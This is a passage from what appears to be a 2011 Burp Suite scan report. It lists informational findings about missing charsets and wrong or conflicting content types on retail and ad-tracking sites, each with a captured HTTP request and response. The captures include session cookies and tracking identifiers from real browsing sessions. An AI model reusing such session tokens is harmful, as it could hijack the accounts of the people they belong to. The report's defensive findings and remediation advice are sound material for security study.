Cookie: s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Tue, 24 Nov 2009 23:13:36 GMT
Accept-Ranges: bytes
Content-Length: 1064
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

<!--
function callCMEventTag(){}
function cmCreateConversionEventTag(){}
function cmCreateCouponOrderTag(){}
function cmCreateCouponTag(){}
function cmCreateDefaultPageviewTag(){}
function cmCreateErr
...[SNIP]...

23.25. https://www.toshibadirect.com/td/b2c/headerAjax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toshibadirect.com
Path:	/td/b2c/headerAjax.jsp

Request

GET /td/b2c/headerAjax.jsp?ts=1305542709474 HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:18 GMT
Content-Length: 40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1

$0.00

23.26. https://www.toshibadirect.com/td/b2c/myaccount.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toshibadirect.com
Path:	/td/b2c/myaccount.to

Request

Response

24. Multiple content types specified previous next
There are 2 instances of this issue:

/if/50
/pix/50

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

24.1. http://tags.mediaforge.com/if/50 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.mediaforge.com
Path:	/if/50

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/html
Content-Type: text/plain

Request

GET /if/50 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uID=CqDfQk3P0kKbugOgCW2AAg==

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:12 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.8.53
Content-Length: 1443
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

24.2. http://tags.mediaforge.com/pix/50 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.mediaforge.com
Path:	/pix/50

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/html
Content-Type: text/plain

Request

GET /pix/50?type=pos HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://tags.mediaforge.com/if/50
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uID=CqDfQk3P0kKbugOgCW2AAg==

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:13 GMT
PRAGMA: no-cache
Server: nginx/0.8.53
Content-Length: 39
Connection: keep-alive

<html><head></head><body></body></html>

25. HTML does not specify charset previous next
There are 17 instances of this issue:

http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://fls.doubleclick.net/activityi
http://media.gnc.com/ipixel
http://media.gsimedia.net/ipixel
https://ordering.ftd.com/empty/index.epl
https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
http://s.xp1.ru4.com/meta
https://secure.bhphotovideo.com/tryagainlater.html
https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js
https://www.armaniexchange.com/pageloading.html
http://www.bhphotovideo.com/tryagainlater.html
http://www.bluenile.com/images2/spix.gif
http://www.ftd.com/
http://www.ftd.com/empty/tealeaf.epl
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

25.1. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=97454&rnd=513812.7808459103 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iGbIaMPo0cFA00001idcDaMPm0cEt00001iEDtaMQF06b+00001iuIZaMPl0aMI00001iETRaMPm06b+00001jxYPaMPg0doZ00001idcEaMPm0cEt00001iN4OaMPo0d9d00000; B3=9xx40000000001uD8Yi+0000000001uD98IM0000000000uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD8VS90000000001uD9fOJ0000000001uC8JJn0000000001uD8VSD0000000001uD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:54:08 GMT
Connection: close
Content-Length: 267

ebReportingImg0 = new Image();
ebReportingImg0.src = 'http://segment-pixel.invitemedia.com/pixel?pixelID=2083&partnerID=31&clientID=1027&key=segment';
ebReportingImg1 = new Image();
ebReportingImg1.sr
...[SNIP]...

25.2. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

GET /activityi;src=1174584;type=fy10p031;cat=petsm990;ord=9762737283017.486? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:13 GMT
Expires: Mon, 16 May 2011 01:53:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

25.3. http://media.gnc.com/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gnc.com
Path:	/ipixel

Request

Response

25.4. http://media.gsimedia.net/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gsimedia.net
Path:	/ipixel

Request

Response

25.5. https://ordering.ftd.com/empty/index.epl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/empty/index.epl

Request

Response

25.6. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Request

Response

25.7. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Request

Response

25.8. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Request

Response

25.9. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Request

Response

25.10. https://secure.bhphotovideo.com/tryagainlater.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/tryagainlater.html

Request

GET /tryagainlater.html HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937; TS20403f=8a761c2c8821a78158429f233f763ae4122d42923efb3af94dd0f9c1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Last-Modified: Fri, 15 Sep 2006 03:25:36 GMT
ETag: "50-450a1d30"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:17:41 GMT
Connection: keep-alive
Content-Length: 160

<html>
<head><script src="/FrameWork/js/tsedge_instr-min.js" type="text/javascript"></script><title>Sorry</title></head>
<body>
Try again later.
</body>
</html>

25.11. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.orientaltrading.com
Path:	/uiframework/skins/default/js/shoppingCart.js

Request

Response

25.12. https://www.armaniexchange.com/pageloading.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.armaniexchange.com
Path:	/pageloading.html

Request

Response

25.13. http://www.bhphotovideo.com/tryagainlater.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/tryagainlater.html

Request

GET /tryagainlater.html HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541030076&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=1305541030075&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Last-Modified: Fri, 15 Sep 2006 03:25:36 GMT
ETag: "50-450a1d30"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:17:11 GMT
Connection: close
Content-Length: 80

<html>
<head><title>Sorry</title></head>
<body>
Try again later.
</body>
</html>

25.14. http://www.bluenile.com/images2/spix.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/images2/spix.gif

Request

GET /images2/spix.gif HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.1.10.1305541144

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3888000
Date: Mon, 16 May 2011 10:23:35 GMT
Content-Type: text/html
Content-Location: http://www.bluenile.com/404-redirect.html?404;http://www.bluenile.com:80/images2/spix.gif
Last-Modified: Tue, 21 Oct 2008 17:06:04 GMT
Accept-Ranges: bytes
ETag: "026ea4c9f33c91:78e6"
Vary: Accept-Encoding
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Content-Length: 178

<HTML>
<HEAD>

<TITLE>redirect</TITLE>
<META HTTP-EQUIV="refresh"
CONTENT="0;URL=http://www.bluenile.com/404.jsp">
</HEAD>
</HTML>

25.15. http://www.ftd.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Request

Response

25.16. http://www.ftd.com/empty/tealeaf.epl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/empty/tealeaf.epl

Request

POST /empty/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 2
X-TeaLeaf-Page-Render: 10033
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; s_sq=%5B%5BB%5D%5D; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; fsr.a=1305510842647
Content-Length: 1206

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H53M22S869R0.8543736196588725" TimeDuration="10033" DateSince1970="1305510812902" >
<Info PageLoadMilliSecs="10033" Version="200
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Content-Type: text/html
Content-Length: 164
Date: Mon, 16 May 2011 01:58:05 GMT
X-Varnish: 767409973
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>TeaLeaf</title></head>
<body>


</body>
</html>

25.17. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Request

Response

26. Content type incorrectly stated previous next
There are 48 instances of this issue:

http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/1785161427
http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/873421027
http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1081786236
http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1469778385
http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1491479342
http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1537867128
http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1729776125
http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/180141734
http://a.monetate.net/trk/3/s/a-835fc909/p/orientaltrading.com/927745947
http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800
http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581
http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001
http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791
http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637
http://a.netmng.com/
http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg
http://action.media6degrees.com/orbserv/hbjs
http://app.gnc.com/profile/javascript/utils.js
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx
http://eval.bizrate.com/js/survey_126457_1.js
http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx
http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard
http://px.steelhousemedia.com/pr
http://rya.rockyou.com/ams/ptrck.php
http://s.xp1.ru4.com/meta
http://sales.liveperson.net/hcp/html/mTag.js
https://secure.bhphotovideo.com/images/!crd_prm!.!cm
https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js
http://shop.pacsun.com/js/widget-qv-uc.jsp
http://sr2.liveperson.net/hcp/html/mTag.js
https://subscriptions.marvel.com/favicon.ico
http://trvlgrd.netmng.com/
http://www.facebook.com/extern/login_status.php
http://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm
http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif
https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm
http://www.linkedin.com/companyInsider
https://www.orderhouse.com/Navigation/DisplayImage.aspx
http://www.petco.com/Handlers/Navigation/MegaMenuHandler.ashx
http://www.res-x.com/ws/r2/Resonance.aspx
http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp
https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp
http://www.siteadvisor.com/images/logo.gif
http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc
http://www.toshibadirect.com/td/b2c/headerAjax.jsp
https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc
https://www.toshibadirect.com/td/b2c/headerAjax.jsp

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/1785161427 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-546f7653/p/petco.com/1785161427

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-546f7653/p/petco.com/1785161427?mr='10949'&mi='1.1314269718.1305510194589'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 01:58:39 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:58:39 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1785161427]]);

26.2. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/873421027 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-546f7653/p/petco.com/873421027

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-546f7653/p/petco.com/873421027?mr='10949'&mi='1.1314269718.1305510194589'&mt=!n&cs=!t&e=!(viewPage)&pt=login&r='http://www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 02:13:57 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 02:13:57 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 873421027]]);

26.3. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1081786236 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-721e8746/p/gnc.com/1081786236

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1081786236?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/8%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%3Frdir%3D1A%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:52:54 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:52:54 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1081786236]]);

26.4. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1469778385 previous next

Summary

Severity:	Information
Confidence:	Firm
